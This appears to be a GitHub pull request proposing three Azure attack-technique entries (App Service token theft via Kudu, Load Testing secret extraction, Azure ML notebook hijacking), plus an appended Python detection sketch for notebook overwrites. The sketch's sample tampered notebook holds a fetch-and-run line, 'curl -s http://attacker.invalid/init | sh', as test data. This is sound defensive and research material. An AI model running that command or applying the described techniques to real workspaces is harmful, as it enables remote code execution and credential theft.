Add AZT606/AZT607/AZT304 #20

Open
swzhouu wants to merge 10 commits into microsoft:main from swzhouu:main

Conversation

@swzhouu swzhouu commented Aug 27, 2025


Title: Add AZT606 – Steal App Service Easy Auth Tokens (Kudu decryption)

This PR proposes a new Credential Access family for stealing Azure App Service Easy Auth tokens, with an initial sub-technique covering token file decryption via the SCM/Kudu site.

  • Adds docs/CredentialAccess/AZT606/AZT606.md (family overview)
  • Adds docs/CredentialAccess/AZT606/AZT606-1.md (App Service Token File Decryption via Kudu)

Notes:

  • AZT606 is a placeholder ID; feel free to renumber or relocate.
  • Content references publicly available research (NetSPI, Daze Security) and Microsoft documentation; no proprietary details included.

swzhouu commented Aug 27, 2025


Title: Add AZT607 – Extract Azure Load Testing Secrets and Tokens

This PR proposes a new Credential Access family for Azure Load Testing, with one sub-technique covering code execution in JMeter/Locust tests to extract injected secrets/certificates and obtain Managed Identity tokens.

  • Adds docs/CredentialAccess/AZT607/AZT607.md (family overview)
  • Adds docs/CredentialAccess/AZT607/AZT607-1.md (JMeter/Locust code execution to extract secrets/tokens)

Notes:

  • AZT607 is a placeholder ID; maintainers may renumber or relocate.
  • Content references publicly available research (NetSPI) and Microsoft documentation; no assumptions beyond cited behavior.

swzhouu commented Aug 27, 2025


Title: Add AZT304 – Hijack Azure Machine Learning Notebooks (via Storage Accounts)

This PR proposes a new Execution family covering AML notebook hijacking by modifying .ipynb files stored in the workspace’s backing Storage Account (Azure Files). The initial sub-technique details Storage Account notebook overwrite leading to code execution, with related detections and mitigations.

  • Adds docs/Execution/AZT304/AZT304.md (family overview)
  • Adds docs/Execution/AZT304/AZT304-1.md (Storage Account Notebook Overwrite)
  • Includes references to NetSPI research, MicroBurst tooling, and Microsoft documentation.

Notes:

  • The ID is set to AZT304 per your request. Maintainers may still renumber or relocate.

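The following is an added example, not content from this PR or from the Azure Threat Research Matrix project: a small Python detection sketch for the AZT304-1 technique described above (overwriting a notebook in the workspace's Azure Files share so that injected code runs when the notebook is next executed). It assumes a simplified access-log record shape (the field names OperationName, Uri, CallerIpAddress and AuthenticationType are assumed for illustration, not a verbatim StorageFileLogs schema), a made-up file share name and caller addresses, a trusted subnet for the compute instances, and two constructed .ipynb documents in the nbformat 4 layout.

```python
import ipaddress
import json
from urllib.parse import urlparse

# Constructed Azure Files access records for an AML workspace's backing storage
# account. Field names are ASSUMED for illustration (not the exact StorageFileLogs
# schema); the share name "code-391ff5ac" and the IP addresses are made up.
SAMPLE_FILE_LOGS = [
    {"OperationName": "GetFile",
     "Uri": "https://wsstorage.file.core.windows.net/code-391ff5ac/Users/alice/train.ipynb",
     "CallerIpAddress": "10.0.1.4", "AuthenticationType": "AccountKey"},
    {"OperationName": "PutRange",
     "Uri": "https://wsstorage.file.core.windows.net/code-391ff5ac/Users/alice/train.ipynb",
     "CallerIpAddress": "203.0.113.7", "AuthenticationType": "AccountKey"},
    {"OperationName": "PutRange",
     "Uri": "https://wsstorage.file.core.windows.net/code-391ff5ac/Users/alice/data.csv",
     "CallerIpAddress": "203.0.113.7", "AuthenticationType": "AccountKey"},
    {"OperationName": "PutRange",
     "Uri": "https://wsstorage.file.core.windows.net/code-391ff5ac/Users/bob/notes.ipynb",
     "CallerIpAddress": "10.0.1.4", "AuthenticationType": "AccountKey"},
]

# Operations that change file content or metadata on an Azure Files share.
WRITE_OPS = {"PutRange", "CreateFile", "CopyFile", "DeleteFile", "SetFileProperties"}


def notebook_writes_from_untrusted(records, trusted_network):
    """Return (operation, path, caller_ip) for every write to a .ipynb file whose
    caller is outside trusted_network (assumed here to be the compute-instance
    subnet). A notebook edit from anywhere else is a candidate overwrite."""
    net = ipaddress.ip_network(trusted_network)
    hits = []
    for rec in records:
        path = urlparse(rec["Uri"]).path
        if rec["OperationName"] not in WRITE_OPS or not path.endswith(".ipynb"):
            continue
        if ipaddress.ip_address(rec["CallerIpAddress"]) in net:
            continue
        hits.append((rec["OperationName"], path, rec["CallerIpAddress"]))
    return hits


# Constructed .ipynb documents: the notebook as the data scientist saved it, and
# the same notebook after a code cell was prepended by someone with share access.
BASELINE_NB = json.dumps({
    "nbformat": 4, "nbformat_minor": 5, "metadata": {},
    "cells": [
        {"cell_type": "markdown", "metadata": {}, "source": ["# Training"]},
        {"cell_type": "code", "metadata": {}, "execution_count": None, "outputs": [],
         "source": ["import pandas as pd\n", "df = pd.read_csv('data.csv')"]},
    ],
})
TAMPERED_NB = json.dumps({
    "nbformat": 4, "nbformat_minor": 5, "metadata": {},
    "cells": [
        {"cell_type": "code", "metadata": {}, "execution_count": None, "outputs": [],
         "source": ["import os\n", "os.system('curl -s http://attacker.invalid/init | sh')"]},
        {"cell_type": "markdown", "metadata": {}, "source": ["# Training"]},
        {"cell_type": "code", "metadata": {}, "execution_count": None, "outputs": [],
         "source": ["import pandas as pd\n", "df = pd.read_csv('data.csv')"]},
    ],
})


def code_cell_sources(nb_json):
    """Extract the source of each code cell; nbformat allows the source to be a
    single string or a list of line fragments, so both forms are normalised."""
    nb = json.loads(nb_json)
    out = []
    for cell in nb["cells"]:
        if cell.get("cell_type") != "code":
            continue
        src = cell.get("source", "")
        out.append("".join(src) if isinstance(src, list) else src)
    return out


def injected_code_cells(baseline_json, current_json):
    """Code cells present in the current notebook but absent from the baseline,
    returned in notebook order. Compare against a known-good copy (e.g. from
    source control) after an unexpected write is observed on the share."""
    baseline = set(code_cell_sources(baseline_json))
    return [src for src in code_cell_sources(current_json) if src not in baseline]


if __name__ == "__main__":
    for hit in notebook_writes_from_untrusted(SAMPLE_FILE_LOGS, "10.0.0.0/16"):
        print("untrusted notebook write:", hit)
    for src in injected_code_cells(BASELINE_NB, TAMPERED_NB):
        print("injected code cell:\n" + src)
```

The two checks are complementary: the log check tells you that a notebook on the share was written by something other than the compute instance, and the content diff tells you what was added, which is what the victim will execute on the next run. Both run offline on the constructed samples above; against a real workspace the same functions would be fed the exported access records and the notebook fetched from the share.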
swzhouu commented Aug 27, 2025


@microsoft-github-policy-service agree

@swzhouu swzhouu changed the title Add AZT606 – Steal App Service Easy Auth Tokens (Kudu decryption) Add AZT606/AZT607/AZT304 Aug 27, 2025
swzhouu commented Aug 27, 2025


Add Jiraput Thamsongkrah (swzhouu) to acknowledgments

@swzhouu swzhouu mentioned this pull request Aug 27, 2025